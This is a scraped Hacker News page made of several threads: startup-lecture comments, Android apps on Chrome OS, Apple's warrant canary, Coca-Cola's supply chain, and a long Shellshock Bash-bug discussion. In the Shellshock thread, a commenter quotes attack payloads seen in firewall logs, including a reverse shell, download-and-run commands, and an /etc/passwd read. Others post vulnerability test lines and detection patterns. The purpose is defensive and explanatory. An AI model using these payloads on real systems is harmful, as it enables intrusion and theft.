(B) The version of GPS done first by the US Navy for the SSBNs.

(C) Beam forming in passive sonar.

(D) The A-bomb of WWII -- all three exploded just as planned.

(E) The H-bomb of the 1950s -- first test, 15 million tons of TNT.

(F) The SR-71, for Mach 3+, 80,000+ feet, 2000+ miles without refueling; proposed by Kelly Johnson just on paper; built and flown just as proposed.

(G) Keyhole satellite, essentially a Hubble, before Hubble, but aimed at earth instead of space.

(H) The F-117 stealth, essentially a modified F-16, flew as planned, through Saddam's anti-aircraft artillery without a scratch.

(I) The airplane the Wright brothers took to Kitty Hawk, NC.

(J) Phased array radar for Aegis class ships.

(K) High bypass turbofan engines.

(L) RSA encryption.

(M) Hubble.

(N) LHC.

(O) COBE, WMAP, and Planck.

And there are many more. Such projects that failed in execution? Tough to find. Batting average? Near 1000.

Right: Projects A-O are all just technical projects. Right. But in each case they provided the intended solution for the need. As we have explained, to have a successful technical solution lead to a successful solution in business, we want such a solution to be a "must have"; else we return to (1).

The high bypass turbofan jet engine a commercial "must have"? Darned right: It saves an ocean of expensive jet fuel. How? Simple: Burning jet fuel releases energy. Want to convert that energy to kinetic energy and get the resulting momentum. But for mass m and velocity v, kinetic energy is (1/2) mv^2 and momentum is just mv. So, we pay in energy (1/2) mv^2 and get in the momentum we want mv.

So, since in kinetic energy we have v^2 but in momentum have just v, to get more of our desired momentum from our given, available energy, we want m to be large and v to be small. So, mostly we want to use the hot gasses from the combustion to turn a big ducted propeller that moves a huge mass of air at a low velocity. Instead, the military jet engines intended for supersonic speeds, and long used in commercial aviation because they were available, move a smaller mass at high velocity. So, for commercial, subsonic flight, a high bypass turbofan is a "must have". Then have the first good one or a much better one, as we have assumed, and very much should have a successful business.

reelgirl 1 day ago 0 replies      
I loved the video and it really encouraged me to keep on trying.
simonebrunozzi 1 day ago 0 replies      
Sam, your voice sounds very irritating to me. Sometimes too fast, no "tempo". I think you should change the way you deliver your points to a classroom. (constructive feedback, not rant)
hanley 2 days ago 0 replies      
Very interesting lectures and it's great that they are doing this. Both of the speakers could benefit from a public speaking class though.
gbachik 2 days ago 0 replies      
It was so good I wish it was Thursday.

I want mooooore!

pmosh 1 day ago 0 replies      
subtitles please!!
porter 2 days ago 1 reply      
Ycombinator leading the way once again. Looking forward to this!
Chromeos-apk Run Android APKs on Chrome OS, OS X, Linux and Windows
469 points by ProfDreamer  6 days ago   92 comments top 19
cryptoz 6 days ago 3 replies      
This is amazing. There's a long reddit thread and some additional instructions here: http://www.reddit.com/r/Android/comments/2gv035/you_can_now_...

From the README:

> Soundcloud - Works, crashes when playing sound

Funny definition of 'works'.

byuu 6 days ago 5 replies      
Can anyone explain how this differs from using an Android emulator? (http://developer.android.com/tools/help/emulator.html)

Is it a matter of features, speed, or convenience? Obviously, all of those can be overcome, be it as a fork of the official emulator or as a third-party emulator. For instance, this new Chrome extension must be the same thing under the hood: a Dalvik runtime, possibly an ARM->Intel recompiler for any NDK applications, etc.

I figured the only reason this wasn't done to mass effect already was because it wasn't in demand. But if it's so desirable, surely creating an actual emulator would be superior to hacking up web browser extensions and ostensibly playing cat-and-mouse with Google over this?

AdmiralAsshat 6 days ago 3 replies      
Neat proof of concept.

I hope Google gets us something official sooner rather than later. It's a little disheartening that I own a Chromebook Pixel and yet I can't use Google's own hardware to design or test Android apps without installing Eclipse on a sideloaded Linux chroot via Crouton.

kasabali 6 days ago 2 replies      
I will absolutely go nuts if this thing manages to run OneNote on my Debian desktop.
wzsddtc 4 days ago 0 replies      
We worked with the ARC team at Vine as a launch partner, there were 0 modifications that we had to do to get it working on ARC. The only difference was that the "bugs" we had to fix were all reproducible on Nexus devices as well BUT the threading model had to be more strict on ARC in terms of accessing system resources.
oldgun 6 days ago 0 replies      
This is amazing.

I hope Google could really carry this project as far as possible. The next several major issues would be polishing up the platform, eliminating the bugs, unifying the android and chromebook development interface. Think of one day when android developers could actually design apps for the desktop. How cool would that be?

That's when Microsoft should really get worried.

niutech 5 days ago 1 reply      
Running Android apps in Chrome on desktop is huge! I'm glad that the ARC runtime I provided in https://github.com/vladikoff/chromeos-apk/issues/5 helped to achieve this.
bla2 5 days ago 0 replies      
Interesting, Google announced working on this on this year's I/O and posted the first apps just one week ago ( http://chrome.blogspot.com/2014/09/first-set-of-android-apps... ).
tracker1 6 days ago 1 reply      
Hope this means good netflix support in Linux.
Flenser 1 day ago 0 replies      
Could you use this to run ChromiumTestShell.apk on windows for testing android chrome rendering?

[1] http://commondatastorage.googleapis.com/chromium-browser-con...

bmelton 6 days ago 1 reply      
So, now we can write apps in Angular that run on the web and compile to Java so that we can install them to Android, running on ChromeOS, running on OSX.


Edit: Perhaps the punny nature of this is deserving of downvotes, but the statement above is the actual use case I presented to a co-developer, discussing how this project could be of use to our app, which was built with Ionic.

FWIW, there's value in it (the app, not necessarily this post) even if it means having to unplug fewer devices to swap them out with different devices to test.

asadotzler 6 days ago 0 replies      
Java makes a triumphant comeback in the browser?
kyrrewk 5 days ago 0 replies      
I have had some success running Android x86 (http://www.android-x86.org/) in VirtualBox.
bussiere 5 days ago 0 replies      
Fuuuuu, Out There, a good game only available on mobile, crashes with this solution ...

Damn, but it looks full of promise. I hope one day it will work well ...

mattfrommars 5 days ago 1 reply      
How is this really good? Android apps are really good but they are designed for touch interface on mobile devices, not desktop.
em3rgent0rdr 5 days ago 0 replies      
Awesome! Works for me on arch linux running latest chromium. Much faster than running android emulator!
chj 6 days ago 0 replies      
Google needs to do this.
mjcohen 4 days ago 0 replies      
Want Open Office!
stuaxo 6 days ago 0 replies      
It's about bloody time!
Everything you need to know about the Shellshock Bash bug
457 points by sjcsjc  13 hours ago   260 comments top 45
jgrahamc 12 hours ago 10 replies      
This is being actively exploited. We (CloudFlare) put in place WAF rules to block the exploit yesterday and I've been looking at the log files for the blocking to see what's going on. Have been seeing things like:

    () { :;}; /bin/ping -c 1 198.x.x.x
    () { :;}; echo shellshock-scan > /dev/udp/example.com/1234
    () { ignored;};/bin/bash -i >& /dev/tcp/104.x.x.x/80 0>&1
    () { test;};/usr/bin/wget http://example.com/music/file.mp3 -O ~/cgi-bin/file.mp3
    () { :; }; /usr/bin/curl -A xxxx http://112.x.x.x:8011
    () { :; }; /usr/bin/wget http://115.x.x.x/api/file.txt
    () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd
    () { :; }; /bin/bash -c "if [ $(/bin/uname -m | /bin/grep 64) ]; then /usr/bin/wget 82.x.x.x:1234/v64 -O /tmp/.osock; else /usr/bin/wget 82.x.x.x:1234/v -O /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock &
If you are one of our (paying) customers the rules to block this exploit are enabled automatically.

PeterWhittaker 9 hours ago 5 replies      
Folks, for what it's worth, here is a management briefing I wrote this morning. Please feel free to re-use, but please do give proper attribution. Please do comment and correct as appropriate.

Summary: Briefing for management on activities to minimize impacts of the "shellshock" computer vulnerability.

Status: Testing underway. Initial appraisals are that public-facing systems are likely not subject to shellshock. NOTE: The situation is fluid, due to the nature of the vulnerability. Personnel are also reaching out to hosting providers to assess the status of intervening systems.

What is it? A vulnerability in a command interpreter found on the vast majority of Linux and UNIX systems, including web servers, development machines, routers, firewalls, etc. The vulnerability could allow an anonymous attacker to execute arbitrary commands remotely, and to obtain the results of these commands via their browser. The security community has nicknamed the vulnerability "shellshock" since it affects computer command interpreters known as shells.

How does it work? Command interpreters, or "shells", are the computer components that allow users to type and execute computer commands. Anytime a user works in a terminal window, they are using a command interpreter - think of the DOS command prompt. Some GUI applications, especially administrative applications, are in fact just graphical interfaces to command interpreters. The most common command interpreter on Linux and UNIX is known as the "bash shell". Within the last several days, security researchers discovered that a serious vulnerability has been present in the vast majority of instances of bash for the last twenty years. This vulnerability allows an attacker with access to a bash shell to execute arbitrary commands. Because many web servers use system command interpreters to fulfill user requests, attackers need not have physical access to a system: The ability to issue web requests, using their browser or commonly-available command line tools, may be enough.

How bad could it be? Very, very bad. The vulnerability may exist on the vast majority of Linux and UNIX systems shipped over the last 20 years, including web servers, development machines, routers, firewalls, other network appliances, printers, Mac OSX computers, Android phones, and possibly iPhones (note: It has yet to be established that smartphones are affected, but given that Android and iOS are variants of Linux and UNIX, respectively, it would be premature to exclude them). Furthermore, many such systems have web-based administrative interfaces: While many of these machines do not provide a "web server" in the sense of a server providing content of interest to the casual or "normal" user, many do provide web-based interfaces for diagnostics and administration. Any such system that provides dynamic content using system utilities may be vulnerable.

What is the primary risk? There are two, data loss and system modification. By allowing an attacker to execute arbitrary commands, the shellshock vulnerability may allow the attacker to both obtain data from a system and to make changes to system configuration. There is also a third risk, that of using affected systems to launch attacks against other systems, so-called "reflector" attacks: The arbitrary command specified by the attacker could be to direct a network utility against a third machine.

How easy is it to detect the vulnerability? Surprisingly easily: A single command executed using ubiquitous system tools will reveal whether any particular web device or web server is vulnerable.

What are we doing? Technical personnel are using these commands to test all web servers and other devices we manage and are working with hosting providers to ensure that all devices upon which we depend have been tested. When devices are determined to be vulnerable, a determination is made whether they should be left alone (e.g., if they are not public facing and patches are either not yet available or would be disruptive at this time, or if there are other mitigations or safeguards in place), patched (e.g., if patches are available and are low impact), or turned off (e.g., if patches are not available, risk is high, and the service is not mandate critical).

Updates to this briefing will be provided as the situation develops.

sequoia 10 hours ago 7 replies      
Read a bit about this because I didn't understand CGI. tl;dr version of what's going on here, if I'm not mistaken (assuming apache/php for this example):

1. Web server (apache) gets request to route to CGI script (PHP)

2. Per the CGI spec, apache passes the request body to PHP as stdin & sets the HTTP headers as environment variables, so PHP can access them

3. In the PHP script, `exec`/`passthru`/`shell_exec` etc. is called to do something in the shell/on the system level. This spawns a new shell (which may be bash)

4. bash interprets the environment variables set by apache

The rub lies in step 4: when bash interprets an environment variable called `HTTP_USER_AGENT` containing the value `() { :;}; /bin/ping -c 1 198.x.x.x` it "gets confused" & interprets that first part (before the second semicolon) as a function, then executes the second part as well

Hopefully this answers the "how does the exploit get from the browser to bash?"

Further question: "If I do not use exec/shell_exec/popen etc, am I still vulnerable (just by virtue of using mod_php)?" AFAICT No, but I am not really sure (I hope someone clears this up).

Additional note about PHP: disabling all these passthru type functions has been recommended for years: http://www.cyberciti.biz/faq/linux-unix-apache-lighttpd-phpi...

f- 10 hours ago 1 reply      
Since the post is relatively non-technical, I'd like to underscore that there are substantial concerns with the original and the followup patch, because with or without it, the underlying bash code parser is still exposed to the Internet. Nobody has posted an RCE vector that would be universally bad for the patched version, but several people have already identified "hmm, that's unexpected" types of global side effects when attacker-controlled strings are parsed as functions by bash. More is likely to come.

As of today, based on our conversations on oss-security, there is a third, unofficial patch that takes a much saner approach of isolating exported functions in a distinct namespace:


Especially in high-value or high-risk scenarios, you may want to give it a try. And if you're interested in the reasons why the original patch is problematic, check out:


philh 12 hours ago 0 replies      
Skimming this post, it appears to only reference CVE-2014-6271 and not CVE-2014-7169, so probably not 'everything you need to know'.

(Searching for '=>' doesn't show anything, which I would expect it to if -7169 was mentioned.)

donatj 13 hours ago 5 replies      
So trying to understand the issue here, is this actually a bash thing or a problem with the web server forwarding commands to bash? I don't understand why bash would be listening to network traffic on its own.
Animats 6 hours ago 0 replies      
If you're running Apache on Linux/UNIX, and don't absolutely need CGI, it's straightforward to turn it off in Apache.

Put a "#" in front of

LoadModule cgi_module modules/mod_cgi.so

in /etc/httpd/conf/httpd.conf. This prevents the code that runs CGI scripts from even being loaded with Apache, and will totally disable all CGI scripts. Apache is willing to execute CGI scripts from far too many directories, and many Linux distros have some default CGI scripts lying around.

This will break CPanel, but not non-CGI admin tools such as Webmin. I can't say anything about PHP; we don't use it.

People are out there probing. This is from an Apache server log today from a dedicated server I run.

    - - [24/Sep/2014:23:08:56 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 338 "-" "() { :;}; /bin/ping -c 1"

The source is on "i3d.net", which is a hosting service in Rotterdam NL. So someone is running probes from something bigger than a desktop. I sent their support people a note.

nacnud 10 hours ago 6 replies      
Unless I've missed something, could some benevolent person use the bug to cause remote systems to run something like "sudo apt-get update && sudo apt-get install bash", to patch the vulnerability automatically? (it makes lots of assumptions, but surely it's better to have some patched systems as a result.)
Animats 5 hours ago 2 replies      
A question worth asking: how long has this been exploited? If you have years of Apache logs, go back through them with "grep" and look for attempts to exploit this vulnerability. Report the earliest date on which you find a hit. Thanks.
neuralk 10 hours ago 2 replies      
For Windows devs: remember that some tools and libraries come with bash (and some may not even tell you explicitly).

For instance, msysgit has the vulnerability[1]:

    $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    vulnerable
    this is a test
[1] from the comments on the blog in the OP

idorosen 10 hours ago 1 reply      
For Mac OS X, until Apple releases a software update, I've applied the original CVE-2014-6271 (shellshock) patch and am going to apply the CVE-2014-7169 patch as well once it passes review. Repository and instructions to reproduce without trusting me are located here:


thyrsus 6 hours ago 1 reply      
Is there a way of preventing functions from being imported from the environment, but still allowing some variables in?

My experiments with

    #!/usr/bin/env -i sh

and

    #!/usr/bin/env - sh

...have not obtained what I'm after.

The problem being that functions take precedence over names in the file system, so

    bash-4.2$ env '/bin/cp=() { echo oops;}' /bin/sh -c '/bin/cp /tmp/foo /tmp/bar'
    oops

mrfusion 11 hours ago 6 replies      
So if your server is set up with limited permissions for the apache-user, are you still at risk?

I don't think the apache-user if properly restricted can write to directories, or even read most of the system files?

jamroom 13 hours ago 2 replies      
From the article:

"Of course one means of mitigating this particular attack vector is simply to disable any CGI functionality that makes calls to a shell"

If you're on Ubuntu:

    a2dismod cgi
    service apache2 restart
If you're NOT running any CGI scripts this will disable CGI support in Apache. Not sure if that takes care of things 100%, but might be helpful.

therealmarv 13 hours ago 1 reply      
Does anybody have steps for what to do really as a sysadmin? Do I only need to install the newest bash (on Linux systems) or do I also need to restart daemons like nginx/apache etc.?
wodow 12 hours ago 1 reply      
Is there a (low volume) mailing list that would have alerted me to both this and Heartbleed?
jeletonskelly 12 hours ago 1 reply      
The only suitable logo for this vulnerability: http://img3.wikia.nocookie.net/__cb20080920183129/nintendo/e...
danso 12 hours ago 3 replies      
In another thread, I saw that this was an easy check to see if your bash was affected:

     env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
If you get "busted" back, then you're affected...which is what I get with Mac OS X 10.9...however, when I try it on an Ubuntu server (14.x) that hasn't been patched in awhile...I don't get the error...Er, why is that? I thought this pretty much affected every bash since 25 years ago?

(Someone else in this thread mentioned that Ubuntu uses dash...so...all modern Ubuntu servers are OK?)

monort 12 hours ago 0 replies      
On Linux dhclient-script is written in bash. If it is vulnerable, then connecting to open wifi can be exploitable via rogue DHCP server.
diyorgasms 12 hours ago 1 reply      
You can tail your access.log and grep the expression "\(?\s_\s\)?\s{|cgi" to get an idea if someone is trying to exploit your webserver. The cgi part will return a lot of false positives, but if you cannot disable cgi, you might as well track it being requested.
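The grep idea above, worked through as an added example (not code from the thread or from any poster) over a few constructed Apache combined-format log lines. It parses each line into fields, looks for the `() {` function marker in the request line, referer and user agent (all of which reach a CGI script as environment variables), separately tags requests for CGI paths so the noisy "cgi" matches can be triaged apart from real probes, and counts probes per source address. The log lines, IPs and timestamps are constructed sample data; the regexes and function names are this example's own.

```python
import re

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"
198.51.100.7 - - [25/Sep/2014:10:12:04 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:12:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 221 "-" "curl/7.37.0"
192.0.2.9 - - [25/Sep/2014:10:12:15 +0000] "GET /() { :;}; echo vulnerable HTTP/1.1" 400 0 "-" "-"
"""

# Bash only treats an exported value as a function when it starts with "() {";
# the whitespace between the parens and the brace varies, so allow any amount.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Requests for CGI-style paths: noisy on their own, useful as context.
CGI_RE = re.compile(r"/cgi-bin/|\.cgi\b|\.sh\b", re.IGNORECASE)

# Apache "combined" LogFormat: host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Return the rule names a single log line triggers.

    Lines that do not parse are reported as 'unparsed' rather than silently
    skipped, so odd input is surfaced instead of hidden.
    """
    m = COMBINED_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    # Every client-controlled header becomes an environment variable for a CGI
    # script, so the marker can arrive in the request line, referer or UA.
    if any(SHELLSHOCK_RE.search(m[f]) for f in ("req", "referer", "ua")):
        findings.append("shellshock")
    if CGI_RE.search(m["req"]):
        findings.append("cgi")
    return findings


def scan(log_text):
    """Return one record per line that triggered a rule (or failed to parse)."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        findings = classify(line)
        if not findings:
            continue
        m = COMBINED_RE.match(line)
        hits.append({
            "ip": m["ip"] if m else None,
            "request": m["req"] if m else line,
            "findings": findings,
        })
    return hits


def suspicious_sources(hits):
    """Count shellshock probes per source IP: the addresses to look at first."""
    counts = {}
    for h in hits:
        if "shellshock" in h["findings"] and h["ip"]:
            counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_ACCESS_LOG)
    for h in found:
        print(h["ip"], h["findings"], h["request"])
    print("probes per source:", suspicious_sources(found))
```

On the sample data the first and fourth lines carry the function marker (one in the user agent, one in the request path), the third is only a CGI request, and the second is clean. Feeding a real log in is a matter of replacing `SAMPLE_ACCESS_LOG` with the file contents; a "shellshock" hit against a 200 response to a CGI path is the combination worth investigating first, since that is a script that actually ran.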
mrfusion 11 hours ago 2 replies      
I see how Apache passes request information through environment variables but I don't see how bash comes into play in typical CGI.

Is anyone up for educating me?

I see http request -> apache -> env variables -> php

What am I missing?

drdaeman 10 hours ago 2 replies      
Has anyone suggested and/or implemented something like building a tiny wrapper for bash that would clean the environment and then execve("/bin/bash.vulnerable", argv, cleaned_envp)?
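The wrapper drdaeman describes, and the "variables in, functions out" behaviour thyrsus was looking for a few comments up, as an added example (not code from the thread or from any poster). Bash of this era only tried to import a variable as a function when its value began with the four characters `() {`, which is what the test commands in this thread rely on, so dropping every entry with that prefix removes all candidates while leaving PATH, HOME and the CGI HTTP_* variables intact. The path `/bin/bash.vulnerable`, the `SAMPLE_ENV` dictionary and the function names are this example's assumptions.

```python
#!/usr/bin/env python3
"""Stand-in for bash that strips exported-function definitions from the
environment and then execs the real binary with the cleaned copy."""
import os
import sys

# Where the renamed, unpatched interpreter lives (assumed path for this example).
REAL_BASH = "/bin/bash.vulnerable"

# Bash imported a variable as a function only when its value began with this.
FUNCTION_PREFIX = "() {"

# Constructed sample environment, mixing ordinary variables with the two
# exported-function shapes seen in this thread.
SAMPLE_ENV = {
    "PATH": "/usr/bin:/bin",
    "HTTP_USER_AGENT": "Mozilla/5.0",
    "x": "() { :;}; echo vulnerable",
    "/bin/cp": "() { echo oops;}",
}


def is_function_export(value):
    """True if bash would attempt to parse this value as a function body."""
    return value.startswith(FUNCTION_PREFIX)


def sanitize_env(env):
    """Return a copy of env with every function-looking entry removed.

    Plain variables survive untouched, so scripts that need QUERY_STRING or
    REMOTE_ADDR still get them; only the function imports are gone.
    """
    return {k: v for k, v in env.items() if not is_function_export(v)}


def dropped_names(env):
    """Names of the entries sanitize_env would remove, for logging or auditing."""
    return sorted(k for k, v in env.items() if is_function_export(v))


def main(argv):
    clean = sanitize_env(os.environ)
    for name in dropped_names(os.environ):
        print(f"bash-wrapper: dropped function export {name!r}", file=sys.stderr)
    # argv is passed through unchanged so $0 and -c arguments behave as before.
    os.execve(REAL_BASH, argv, clean)


if __name__ == "__main__":
    main(sys.argv)
```

Two caveats a sysadmin would want before relying on this: the wrapper only helps on invocation paths that actually go through it, so `/bin/sh` symlinks and `#!/bin/bash` shebangs in CGI scripts all have to resolve to the wrapper rather than the renamed binary; and it is a stopgap, since the patched bash packages remove the import behaviour at the source.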
txutxu 11 hours ago 0 replies      
With only static content (all logic implemented via cron).

    $ grep nginx /etc/passwd
    nginx:x:105:111:nginx user,,,:/nonexistent:/bin/false
And the only other service listening in this machine is SSH, but it's limited by iptables only to my home IP.

I think I'm safe. Now installing updates patches bash.

Anyway, I've seen that syntax before (I'm talking of years here), on #bash in freenode.

Simply nobody applied this from a security viewpoint in the channel...

Igglyboo 12 hours ago 3 replies      
Can anyone explain what I should do on OSX?

I've heard that replacing /bin/bash with a newer version of bash from homebrew or even zsh will work but is that going to break anything that assumes 3.2 bash??

spilk 12 hours ago 1 reply      
I've seen a lot of talk regarding the impact on embedded devices, but how many of these actually run GNU Bash? I can't think of many embedded devices that don't use Busybox instead.
earlz 11 hours ago 1 reply      
Has anyone constructed this exploit as a simple `wget` command?
muyuu 11 hours ago 0 replies      
Either of these will typically show you your running terminal:

ps -p $$

echo $0 (command name that was used to invoke the shell)

Not reliable: echo $SHELL (preferred shell for the user, not necessarily what is running)

Also note that you may want to remove/fix bash to make sure it doesn't get run by something else. A CGI script may run it despite you changing your default shell to something else.

therealmarv 12 hours ago 2 replies      
When comparing the security warning from RedHat https://access.redhat.com/solutions/1207723 vs Ubuntu http://www.ubuntu.com/usn/usn-2362-1/ the RedHat one wants you to run /sbin/ldconfig or reboot your machine. Why does Ubuntu not recommend this? Do they run ldconfig automatically?
milankragujevic 9 hours ago 0 replies      
Here is a simple tool that you can use to check if your website is vulnerable: http://milankragujevic.com/projects/shellshock/
weavie 12 hours ago 2 replies      
I bet Microsoft are enjoying the fact that it is Linux that seems to have all the security vulnerabilities these days!
cyphunk 9 hours ago 0 replies      
I seem to remember somewhere on Show HN a service that lets one execute a command to populate an online pastebin. Something like: `cat | nc service.com 9199`. Now however I cannot find this service. Anyone know where?
AYBABTME 9 hours ago 2 replies      
I'm confused by this vuln report and all the attention.

If I don't run any CGI thing and I don't expose SSH without pubkey and only to trusted users, what is there for me to worry about?

magpi3 9 hours ago 0 replies      
Can the bug be avoided just by setting the default shell for your webserver's user (generally www-data in debian) to /bin/dash? At least from the perspective of Apache users?
Rabidgremlin 5 hours ago 0 replies      
mmm, just checked a couple of servers and found suspect activity :(

Also this test for vulnerability seems more accurate:

x='() { :;}; echo vulnerable' bash

TeeWEE 9 hours ago 1 reply      
The article points out you can run the following code to check whether you are affected:

    env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
However... This just shows that the bash installation has this problem. If the webserver you are running is not interacting with bash, then there is no problem at all.

So look at your webserver. It's not per se a problem in bash. It's more a problem of webservers using bash directly.

Or is this bug more serious?

arielby 6 hours ago 0 replies      
ISC DHCP Client has a check_option_values function (at the end of dhclient.c), which (if it is properly used, I don't understand the surrounding code enough) should prevent this from being exploited.
Globz 9 hours ago 0 replies      
I tried the vuln on win-bash but nothing so far, it just doesn't give an error and doesn't echo out anything..
aembleton 13 hours ago 0 replies      
Excellent, a comprehensive write up on the issue. Exactly what I was looking for.
frankydp 12 hours ago 1 reply      
Is anyone able to get the echo test to pass after updating AWS bash?
EdSharkey 12 hours ago 0 replies      
This is why I don't run Apache on my servers. Too many crufty old plugins designed in the days of peace and love.

Give me servers running under JVM that do the focused few things they do very, very well.

lurkinggrue 9 hours ago 0 replies      
Can you test for this using curl?
ck2 12 hours ago 1 reply      
Keep an eye on the patches directory for whatever version you use:


Just had to manually patch a CentOS4 legacy system.

What I find interesting is the patch has been around since the 16th, what took so long and what finally lit a fire under the mainstream *nix releases?

Glan1984 11 hours ago 1 reply      
How about installing zsh and making that the default shell? Is that enough?
peterwwillis 12 hours ago 2 replies      
There's no way that this bug could affect even a fraction of the number of users Heartbleed did. The number of affected machines is probably 1/10000th that of heartbleed, and heartbleed exposed hundreds of millions of users, the SSL keys of servers, etc to attack. The fact that legacy CGI scripts are the only attack vector being discussed right now is proof enough of how outdated this bug is.

Keep in mind that hackers constantly take advantage of old exploitable legacy software in servers around the world to get a shell, and nobody freaks out about it.

Apple's warrant canary disappears
406 points by panarky  7 days ago   93 comments top 15
kwhite 7 days ago 4 replies      
Is there any reason why a company could not apply the same concept of a warrant canary on a user-by-user basis?

Imagine seeing a message every time you log into your Gmail account informing you that Google has never been compelled to surrender your private data to a law enforcement agency.

panarky 7 days ago 1 reply      
Possible explanations:

1) It wasn't a canary to begin with, so its removal means nothing.

2) There's no legal precedent for disclosing a Section 215 order by killing the canary, so Apple removed it before they received a Section 215 order. That way it doesn't disclose anything and Apple avoids legal liability.

3) Apple really did receive a Section 215 order.

rrggrr 7 days ago 0 replies      
As explained by Apple:

In the first six months of 2014, we received 250 or fewer of these requests. Though we would like to be more specific, by law this is the most precise information we are currently allowed to disclose.


nl 7 days ago 1 reply      
Interesting and somewhat disappointing that it took a year for anyone to notice that it had disappeared. The appearance generated quite a lot of interest.

(Of course, I'm as responsible as anyone else for not noticing. I wonder if it would be possible to build a service to proactively check for their disappearance?)

UVB-76 7 days ago 2 replies      
Gee, thanks for the hat tip...


johnhess 7 days ago 4 replies      
Could a lawyer or someone with familiarity with warrants like these explain how a "warrant canary" is legal?

I understand the concept, but it discloses something you can't disclose. They can compel you to lie/not comment if asked, "Hey, Apple, did you get any of those National Security Letters".

Is there a clear cut loophole or is this something yet to be challenged?

tkinom 7 days ago 1 reply      
I wonder what happens if Russia, China, India, Japan, and the EU all demand the same level of access to Apple's data.

Apple might not care about Iran or other smaller countries, but how is it going to deal with big markets like China, India, the EU?

chiph 7 days ago 0 replies      
Under what conditions would the warrant canary statement reappear? I'm thinking of those workplace safety signs: "This corporation has operated for [ 179 ] days without a Section 215 warrant being served"
crazypyro 7 days ago 0 replies      
Have any of the other major tech companies had similar canary disappearances? I only ask because this is the first time I've heard of one actually being used by a tech company as a warning flare.

I'd expect a governmental legal challenge...

MrJagil 7 days ago 11 replies      
I've asked this before to no avail, but what can the NSA possibly do if Apple refuses?

Fine them? Sure, they have billions.

They can't arrest the company... Is Cook going to jail? What is the actual threat here? You could argue that Apple has more power than many governments.

staunch 7 days ago 1 reply      
Apple should just declare that they have been subject to Section 215. Given how many users Apple has it can't reasonably be argued that such a disclosure would be a danger to national security.

Hopefully they would end up before SCOTUS and help defang the USA PATRIOT Act.

stevewepay 7 days ago 0 replies      
So now what? Now that the canary has disappeared, is there no other information that can be transmitted to us? It feels like it's a binary signal that just got set permanently, so there's no more information we can glean from it.
ForHackernews 7 days ago 1 reply      
Very interesting in light of this: https://news.ycombinator.com/item?id=8333258
maresca 7 days ago 0 replies      
Perhaps this is the reason for all of the security updates in iOS 8.
What Coke Contains (2013)
406 points by fmela  6 days ago   176 comments top 33
d0mdo0ss 6 days ago 4 replies      
> coca-leaf which comes from South America and is processed in a unique US government authorized factory in New Jersey to remove its addictive stimulant cocaine

According to Wikipedia "The Stepan Company is the only manufacturing plant authorized by the Federal Government to import and process the coca plant, which it obtains mainly from Peru and, to a lesser extent, Bolivia. Besides producing the coca flavoring agent for Coca-Cola, the Stepan Company extracts cocaine from the coca leaves, which it sells to Mallinckrodt, a St. Louis, Missouri, pharmaceutical manufacturer that is the only company in the United States licensed to purify cocaine for medicinal use."

Someone1234 6 days ago 11 replies      
I wish Coca Cola would make an acid-free version of coke. The Phosphoric Acid adds a slight tang to the drink, but in exchange absolutely destroys your teeth over years of consumption.

For regular drinkers like myself I'd happily pay a small premium to buy the "acid free" version of the drink. The sugar still does damage but with both the acid AND sugar it is like a double whammy of "badness" (acid which destroys your teeth's natural protective coating, and sugar to feed the bacteria which actually eat away at your teeth).

No amount of brushing can really undo the amount of damage acidic soda does to your teeth, trust me I know! Even with prescription toothpaste with fluoride 5x times stronger than normal (5000 ppm toothpaste Vs. 1100 ppm) you're only slowing down the progression.

jstalin 6 days ago 4 replies      
The same type of story as the classic "I, pencil," published in 1958:


srean 6 days ago 1 reply      
The article waxes so eloquently about this beloved product that I would have mistaken it for a paid PR piece. The article is a great read nonetheless.

Those who are also interested in the other, darker, grimier side of the same coin might want to check out its use of mercenaries for union busting in South America (by murder, of course. In the hands of the right spinners that would be 'terrorism'); similar stuff happened in India as well.



klinquist 6 days ago 3 replies      
You can make your own almost-Coke... OpenCola, the open-source cola.


gokhan 6 days ago 9 replies      
> The number of individuals who know how to make a can of Coke is zero.

This reminds me of a fact I remember from time to time. If civilization collapses after, say, a world war, I most probably can't make a pot, can't grow plants, can't tell whether one is edible or not, can't dig for petrol, can't make plastic (or even glass), can't reinvent concrete, can't make gunpowder etc., you get the point.

I can only write software and maybe drill with tools and nail with a hammer but that's all.

bjornsing 6 days ago 3 replies      
> The top of the can is then added. This is carefully engineered: it is made from aluminum, but it has to be thicker and stronger to withstand the pressure of the carbon dioxide gas, and so it uses an alloy with more magnesium than the rest of the can.

Nope, the pressure from the carbon dioxide pushes equally against all sides of the can. If anything the pressure at the top is slightly lower than at the bottom, at least if the can is standing, because of the weight of the coke pushing against the bottom.

vesche 5 days ago 0 replies      
> ... the inside of the can is painted too, with a complex chemical called a comestible polymeric coating that prevents any of the aluminum getting into the soda.

I thought this was very interesting, so I did a little digging... There is remarkably little information on these 'comestible polymeric coatings', but I was able to find (see below) a reason as to why that is. Apparently these coatings are proprietary to the manufacturer and there are competing companies who are constantly in a race to find the best coating.

It's supremely interesting the fact that drinking a can of coke is almost a magic trick right in front of your eyes. It'd be like someone holding a lighter straight to a piece of paper and everyone being baffled as to why it isn't lighting on fire. Yet when someone drinks a coke no one bats an eye as to how it isn't mixing with the metal salts and eating straight through the aluminum can.

